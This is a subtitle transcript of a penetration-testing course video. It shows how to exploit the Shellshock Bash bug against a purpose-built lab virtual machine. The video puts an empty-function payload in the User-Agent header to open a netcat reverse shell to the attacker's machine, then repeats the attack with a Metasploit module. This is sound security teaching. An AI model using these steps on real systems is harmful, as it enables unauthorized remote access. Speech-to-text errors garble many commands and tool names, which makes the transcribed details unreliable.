1
00:00:00,420 --> 00:00:01,140
Welcome back.

2
00:00:01,740 --> 00:00:08,820
It is time that we cover our first vulnerability in a website and as a first vulnerability, I've chosen

3
00:00:08,820 --> 00:00:10,950
to show you the shellshock exploitation.

4
00:00:11,930 --> 00:00:18,830
Now, shellshock is an older vulnerability, it was discovered in 2014, and you will most likely never

5
00:00:18,830 --> 00:00:22,190
find it today while performing penetration tests.

6
00:00:22,490 --> 00:00:29,840
But nonetheless, I want to show it to you just because of the impact that it had, Shellshock is considered

7
00:00:29,840 --> 00:00:33,980
one of the most critical and serious vulnerabilities ever discovered.

8
00:00:34,670 --> 00:00:40,700
This vulnerability occurred due to bash differently processing environmental variables.

9
00:00:41,300 --> 00:00:48,560
With this, many things were hit from the clients, from terminal command lines to CGI scripts inside

10
00:00:48,560 --> 00:00:49,730
of Web applications.

11
00:00:49,970 --> 00:00:56,540
And in this tutorial, we will see an example of exploiting shell shock through the CGI script on a

12
00:00:56,550 --> 00:00:57,170
Web page.

13
00:00:58,040 --> 00:01:04,130
Also for this, we're going to download a small ISO file that will allow us to run a virtual machine

14
00:01:04,430 --> 00:01:06,410
only for this vulnerability.

15
00:01:07,150 --> 00:01:13,100
Don't worry, it'll only take a few seconds to install due to being a small virtual machine, and it

16
00:01:13,100 --> 00:01:16,190
is only purposely designed for this specific vulnerability.

17
00:01:17,070 --> 00:01:22,950
To download it, you want to go to your Google, you can type in pen tester, lab shellshock and you

18
00:01:22,950 --> 00:01:30,240
should see a link like this that says CVT 2014 six to seven one called Shellshock.

19
00:01:30,720 --> 00:01:33,290
It will be from the pen tester lab dot com.

20
00:01:33,300 --> 00:01:38,790
And you want to click on it and it will never get you to this page right here where you will have the

21
00:01:38,790 --> 00:01:44,100
shell shock, introduction, fingerprinting and all the other stuff regarding this vulnerability.

22
00:01:44,110 --> 00:01:50,360
However, we're not going to go into these details right here because we want to exploit it ourselves.

23
00:01:51,090 --> 00:01:54,450
What we want to do is we want to go to the files right here.

24
00:01:54,960 --> 00:02:01,020
And you should see this ISO where you want to click on it and it will download the ISO image with the

25
00:02:01,020 --> 00:02:03,780
size of nineteen point one megabytes.

26
00:02:04,080 --> 00:02:06,390
So you can see it is really, really small.

27
00:02:07,320 --> 00:02:12,150
Once you do that, you want to go to your virtual box and you want to create a virtual machine, as

28
00:02:12,150 --> 00:02:12,910
we usually do.

29
00:02:13,650 --> 00:02:18,650
Now, I already got shell shock lab created with the ISO file that we just downloaded.

30
00:02:18,840 --> 00:02:23,610
But what you essentially want to do is you want to click on you, then you can call it anything you

31
00:02:23,610 --> 00:02:23,910
want.

32
00:02:23,910 --> 00:02:25,380
You can call it shell shock.

33
00:02:26,310 --> 00:02:29,310
You can select right here Linux as an operating system.

34
00:02:29,310 --> 00:02:33,330
And the version of Linux is going to be other Linux, 32 bit.

35
00:02:33,660 --> 00:02:36,160
Click on that, then you can proceed to next.

36
00:02:36,450 --> 00:02:39,330
You can leave it to two hundred and fifty six megabytes of RAM.

37
00:02:39,330 --> 00:02:41,030
That is more than enough for this machine.

38
00:02:41,550 --> 00:02:42,630
Click on next right here.

39
00:02:43,080 --> 00:02:47,370
We want to create a virtual machine next here next year as well.

40
00:02:47,370 --> 00:02:49,560
And we can click on create.

41
00:02:50,650 --> 00:02:55,180
And as usual, there are two more things that we want to do once we create a new virtual machine, we

42
00:02:55,180 --> 00:02:58,450
want to navigate to the settings from the settings.

43
00:02:58,450 --> 00:03:04,900
We want to go to network, switch from Beñat to Bridgid adapter, select your adapter right here.

44
00:03:05,110 --> 00:03:09,070
And another thing that you want to do is we want to add our ISO file.

45
00:03:09,520 --> 00:03:11,740
So delete this empty right here.

46
00:03:13,150 --> 00:03:23,140
Click on the disc icon, click on Add and find the ISO file in my case, here it is CV 2014 six to seven

47
00:03:23,140 --> 00:03:25,900
one click on Choose and click on.

48
00:03:25,930 --> 00:03:29,350
OK, this will create your shellshock virtual machine.

49
00:03:30,290 --> 00:03:36,170
After you do that, you want to go to your clinics, start your burps at all that we covered already,

50
00:03:36,380 --> 00:03:42,860
that we covered the configuration of and you want to go start it up, and after you start it up, you

51
00:03:42,860 --> 00:03:44,600
can open your Firefox.

52
00:03:45,320 --> 00:03:51,290
Now, you might have noticed if you tried before watching this video that once you tried to visit Firefox

53
00:03:51,650 --> 00:03:56,060
without having Burset running, you will not be able to visit any page.

54
00:03:56,390 --> 00:04:00,720
And that is because we set our site to be a proxy for our Firefox.

55
00:04:01,010 --> 00:04:08,990
So now every time you want to visit Firefox page or any website page, you must have Burset open and

56
00:04:08,990 --> 00:04:13,760
you must also have the intercept turned off so it doesn't intercept any packets.

57
00:04:14,120 --> 00:04:16,880
Otherwise your page will just load forever.

58
00:04:17,750 --> 00:04:24,830
Now that we opened the Firefox, let us open to it is starting the project and as soon as it opens up,

59
00:04:25,130 --> 00:04:29,600
we will be able to visit our page on our Shellshock virtual machine.

60
00:04:30,200 --> 00:04:38,170
OK, so now the burps it opened, go to Target, then go to proxy and turn off the intercept right here.

61
00:04:38,270 --> 00:04:39,980
So intercept should be off.

62
00:04:40,670 --> 00:04:46,370
Once you do that, the next thing that we want to do is we want to start our shellshock virtual machine.

63
00:04:47,090 --> 00:04:51,680
If you're starting it for the first time, it should only take a few seconds to set everything up,

64
00:04:51,680 --> 00:04:54,230
since it is a really, really small virtual machine.

65
00:04:54,650 --> 00:04:58,300
And once it opens up, it won't even prompt you for a login.

66
00:04:58,670 --> 00:05:01,730
There is no login available inside of this machine right here.

67
00:05:02,980 --> 00:05:08,530
It will just enter the command line where we want to type of conflict just to find out the IP address

68
00:05:08,530 --> 00:05:13,080
of this machine and in this case it is 192 that 168 at one to 10.

69
00:05:13,630 --> 00:05:20,200
So all we want to do is we want to go to our Firefox and visit this page to see what we have.

70
00:05:21,700 --> 00:05:29,920
And this seems to be the entire page of this virtual machine we get, this system is running the time

71
00:05:29,920 --> 00:05:34,870
that it is running currently for zero minutes because we just started it up and we get the kernel of

72
00:05:34,870 --> 00:05:36,100
that virtual machine.

73
00:05:37,280 --> 00:05:43,910
Now, if we take a look at our berp suit right now and we go to the targets and we go to our IP address

74
00:05:43,940 --> 00:05:50,570
of the shell shock virtual machine, we will see all the links that we requested once trying to up the

75
00:05:50,570 --> 00:05:53,540
Web page of our shell shock virtual machine.

76
00:05:54,080 --> 00:05:55,970
We will see this directory.

77
00:05:56,180 --> 00:06:02,150
We will see this JavaScript file and we will see this CGI pin status directory.

78
00:06:02,600 --> 00:06:05,480
So we get a CGI script right here.

79
00:06:06,260 --> 00:06:09,860
If we go to the response of that request that we sent.

80
00:06:09,860 --> 00:06:16,340
And to do that, you simply just select the request that you want to go to and click on response right

81
00:06:16,340 --> 00:06:16,660
here.

82
00:06:17,420 --> 00:06:18,710
Then we will sit down here.

83
00:06:18,710 --> 00:06:23,420
This output that looks a lot like an output to the command.

84
00:06:23,660 --> 00:06:26,000
You name Dash eight, for example.

85
00:06:26,000 --> 00:06:31,670
If you run the command, you name Dash eight inside of your terminal, it will give you an output like

86
00:06:31,670 --> 00:06:36,140
this, which will tell you which version of Linux are you running and so on and so on.

87
00:06:36,350 --> 00:06:40,970
We get a similar output inside of our burps, as we can see right here.

88
00:06:42,120 --> 00:06:51,090
And in most cases, this output is run by the unnamed I command and it is run by Basche and inside this

89
00:06:51,090 --> 00:06:58,320
request that we did user agent field that we got inside of the request is an environmental variable

90
00:06:58,320 --> 00:07:01,300
when processed inside of this CGI script.

91
00:07:02,100 --> 00:07:06,380
So what we can try is to inject the command in that field.

92
00:07:06,630 --> 00:07:09,410
However, it won't work that easy.

93
00:07:09,570 --> 00:07:15,720
We can just inject, for example, who am I command instead of this, it will not give us any output

94
00:07:15,720 --> 00:07:16,080
back.

95
00:07:16,780 --> 00:07:17,830
You might be asking why?

96
00:07:17,970 --> 00:07:23,820
Well, because shell shock vulnerability is based on first specifying an empty function.

97
00:07:24,180 --> 00:07:29,250
And I know this might sound confusing, but just stick with me for a couple more minutes and I will

98
00:07:29,250 --> 00:07:30,570
explain it how it works.

99
00:07:30,870 --> 00:07:36,750
The vulnerability itself was discovered when inside of an environmental variables such as this user

100
00:07:36,750 --> 00:07:44,790
agent, empty function syntax was specified and empty function syntax looks something like this.

101
00:07:45,660 --> 00:07:51,810
Let me show you inside the terminal, it is this set of characters to open bracket, close bracket and

102
00:07:51,810 --> 00:08:01,380
space, open curly bracket CDN space to dot, dot and comma and closed curly bracket and at the end

103
00:08:01,390 --> 00:08:02,970
another dot and comma.

104
00:08:03,180 --> 00:08:07,950
And this right here is a syntax for an empty function.

105
00:08:08,310 --> 00:08:14,580
So any command that we want to run before it, we must have this empty function syntax y.

106
00:08:14,850 --> 00:08:22,260
Well when Besch gets these characters in this order, or if Bush gets these empty function with the

107
00:08:22,260 --> 00:08:28,380
variable instead of blocking it, it will accept it with a variable that comes after and it runs it

108
00:08:28,380 --> 00:08:30,090
as a command on the server.

109
00:08:30,540 --> 00:08:32,550
And that is the entire vulnerability.

110
00:08:32,970 --> 00:08:38,400
All we have to do is specify a command after the syntax and it should work.

111
00:08:38,790 --> 00:08:47,760
Now, to do that, we must send this HTP request right here to this CGI script once again, and we must

112
00:08:47,760 --> 00:08:52,360
specify, instead of the user agent, the empty function syntax and then our command.

113
00:08:53,100 --> 00:08:54,400
So how can we do that?

114
00:08:54,420 --> 00:08:56,170
How can we send the request once again?

115
00:08:56,520 --> 00:09:02,580
Well, luckily it allows us to edit our requests and send them as many times as we want.

116
00:09:03,270 --> 00:09:07,470
All we need to do is to select the request that we want to send again.

117
00:09:07,470 --> 00:09:08,850
So we select it right here.

118
00:09:09,210 --> 00:09:13,290
Then we write click and send to repeater right here.

119
00:09:13,930 --> 00:09:16,800
Then you will see this repeater part light up.

120
00:09:16,860 --> 00:09:18,540
We want to go there and here.

121
00:09:18,540 --> 00:09:22,130
We can edit our request before actually sending it.

122
00:09:22,800 --> 00:09:26,880
So we mentioned that we want to inject the command inside of the user agent field.

123
00:09:27,060 --> 00:09:28,590
Let us remove this.

124
00:09:30,620 --> 00:09:37,970
And let's type the syntax for the anti function first, so open and closed bracket, that empty space,

125
00:09:37,970 --> 00:09:45,830
open curly bracket, then space, two dots, comma and dot, close curly bracket and comma and dot at

126
00:09:45,830 --> 00:09:46,310
the end.

127
00:09:47,270 --> 00:09:53,120
Now, what you can do after this is you can inject your comment and if you want to, you can test to

128
00:09:53,120 --> 00:09:55,670
see if it works with the ping command first.

129
00:09:56,000 --> 00:09:58,090
But I'm not going to test it with the ping command.

130
00:09:58,100 --> 00:10:03,950
I'm going to straightaway try to establish a connection with our Kalinda's machine and get our reverse

131
00:10:03,950 --> 00:10:04,590
channel back.

132
00:10:05,390 --> 00:10:09,170
So what do we want to do right here to establish a connection with our killing machine?

133
00:10:09,440 --> 00:10:18,020
Well, we want to execute bin Bash and this will tell the target to execute the following comment.

134
00:10:18,020 --> 00:10:24,080
If we specify Desh see after, it will tell our target that whatever we send after this will be our

135
00:10:24,080 --> 00:10:27,310
command and we must specify between the single quotes.

136
00:10:27,770 --> 00:10:36,050
So for now we have the empty function syntax, then bin bash, bash see, then open single quotes and

137
00:10:36,050 --> 00:10:42,410
closing quotes and in between the quotes we type and see which stands for Netcare and we specify the

138
00:10:42,410 --> 00:10:44,320
IP address of our Calientes machine.

139
00:10:44,510 --> 00:10:46,590
So let's check it out right here.

140
00:10:46,740 --> 00:10:49,040
So I have config test.

141
00:10:49,040 --> 00:10:52,550
One, two, three, four is my password and I will specify 182.

142
00:10:52,550 --> 00:10:53,350
That 168.

143
00:10:53,350 --> 00:10:54,170
That one, that nine.

144
00:10:54,560 --> 00:10:58,300
So right here one add to that 168, that one dot nine.

145
00:10:59,090 --> 00:11:02,410
And I want to specify also the port to connect to.

146
00:11:02,750 --> 00:11:05,950
In my case I will use port one, two, three, four, five.

147
00:11:05,960 --> 00:11:07,010
It doesn't really matter.

148
00:11:07,340 --> 00:11:14,210
And at the end we want to specify Desh E, which stands for what we want to execute on our target machine.

149
00:11:14,360 --> 00:11:21,350
And we want to simply just use the shell so we can do that by specifying slash and slash Besch.

150
00:11:21,800 --> 00:11:27,680
And this is the entire comment about Cupitt to my terminal so you can see it enlarged.

151
00:11:27,860 --> 00:11:33,800
So Copi and if I can clear the screen paste it's right here.

152
00:11:34,720 --> 00:11:41,410
This is our entire comment, the empty function syntax and then the function that allows us to establish

153
00:11:41,410 --> 00:11:43,380
a connection to our Caledonius machine.

154
00:11:43,990 --> 00:11:49,570
But before we send this request from our Burset, we must set up a listener right here.

155
00:11:49,580 --> 00:11:52,810
So I'm just going to go and type and see AVP.

156
00:11:52,870 --> 00:11:58,660
And then on the part that we specified, which is one, two, three, four, five, press enter this

157
00:11:58,660 --> 00:12:00,520
will listen for the incoming connections.

158
00:12:00,520 --> 00:12:06,040
And now that we change the user agent feel to our command, we can click on send.

159
00:12:07,050 --> 00:12:13,390
If I go back to our clinic's terminal, we can see if we got the connection from our Shellshock virtual

160
00:12:13,410 --> 00:12:16,980
machine and if we tried to execute commands such as Who am I?

161
00:12:17,130 --> 00:12:18,560
All of that will work.

162
00:12:18,780 --> 00:12:20,120
We can see if we are dependent.

163
00:12:20,120 --> 00:12:25,980
The lab, the command will give me all the directories inside of the current directory.

164
00:12:26,010 --> 00:12:34,770
I can type to check out my current working directory and I am in this bar sledged w w w CGI dash bin

165
00:12:34,770 --> 00:12:35,170
folder.

166
00:12:36,080 --> 00:12:36,510
Great.

167
00:12:36,800 --> 00:12:42,270
So we successfully exploited this shell shock vulnerability and gained access to this machine.

168
00:12:43,100 --> 00:12:48,380
Now you can also automate this entire process with metal plate framework.

169
00:12:48,740 --> 00:12:53,840
So what we did right here is we manually exploited the target with the help of a Burset.

170
00:12:54,140 --> 00:12:58,250
We sent our request for the CGI script to the repeater.

171
00:12:58,400 --> 00:13:04,100
Then we changed the user field to our command, which requires the empty syntax at the beginning and

172
00:13:04,100 --> 00:13:08,510
after it, the command that we want to execute, which can be any command that you really want.

173
00:13:08,990 --> 00:13:15,320
Then we set up a listener inside of our terminal and we sent this packet once again or we sent this

174
00:13:15,320 --> 00:13:16,600
request once again.

175
00:13:16,910 --> 00:13:22,580
Right here we can see the response to this request and it tells us that we got the internal server error

176
00:13:23,060 --> 00:13:26,140
because it doesn't really recognize this user agent.

177
00:13:26,420 --> 00:13:33,100
However, it did execute this command, which is all that we want inside of the metabolite framework.

178
00:13:33,110 --> 00:13:35,000
You can type search shellshock.

179
00:13:36,930 --> 00:13:44,520
And you can use this exploit right here, which is exploit multi HTP, Apache mode, CGI, Besch, environmental

180
00:13:44,520 --> 00:13:50,220
execution, you can copy that type of use and then paste this election.

181
00:13:50,370 --> 00:13:57,150
It will set our payload to be Linux X 86 Metropia to reverse DCB and if I type show options.

182
00:13:58,480 --> 00:14:00,590
I can set my options right here.

183
00:14:00,610 --> 00:14:05,350
So what I must set is the our hosts, which is the IP address or my target machine.

184
00:14:05,840 --> 00:14:06,790
Let's do that first.

185
00:14:10,030 --> 00:14:12,910
But I also must said, is this our path?

186
00:14:12,910 --> 00:14:16,470
So this will be the path to the CGI script.

187
00:14:16,870 --> 00:14:25,240
So the our path must be set to CGI dash bin status, if I'm not mistaken.

188
00:14:25,240 --> 00:14:29,500
That is the path let us see inside of our website.

189
00:14:29,510 --> 00:14:39,970
So it indeed is CGI bin and then status and all we are left to do right now is set this and run our

190
00:14:39,980 --> 00:14:40,500
exploit.

191
00:14:40,990 --> 00:14:41,680
Oh pardon me.

192
00:14:41,680 --> 00:14:42,630
It's not there.

193
00:14:42,640 --> 00:14:45,370
Let's just go and set the target.

194
00:14:45,400 --> 00:14:45,910
You're right.

195
00:14:46,330 --> 00:14:47,310
It is target.

196
00:14:47,320 --> 00:14:50,240
You are right that we must set to be the CGI bin status.

197
00:14:50,260 --> 00:14:54,310
So let's just set the target right instead.

198
00:14:56,060 --> 00:15:00,930
And let's set the our path back to Spain, I believe, and let's give this a try.

199
00:15:01,370 --> 00:15:04,970
We send this if we get them a therapy session, one opened.

200
00:15:06,140 --> 00:15:14,660
And here it is to get user ID will tell us who we are, we can execute the commands and we can do everything

201
00:15:14,660 --> 00:15:16,790
that we did inside of our exploitation section.

202
00:15:17,540 --> 00:15:24,490
So we successfully exploited shellshock vulnerability in two different ways manually by using it and

203
00:15:24,500 --> 00:15:30,690
sending over command in the user agent field and with the help of this metal plate framework module.

204
00:15:31,280 --> 00:15:34,100
It also exploited the user agent field.

205
00:15:34,100 --> 00:15:35,210
As we can see right here.

206
00:15:35,840 --> 00:15:41,120
We told the path to be CGI in status and we got the interpreter reverse shellback.

207
00:15:41,630 --> 00:15:42,050
Great.

208
00:15:42,230 --> 00:15:47,180
Now that we did this in the next video, we are going to check out a very similar thing to this, which

209
00:15:47,180 --> 00:15:50,480
is called command injection scene with the next video.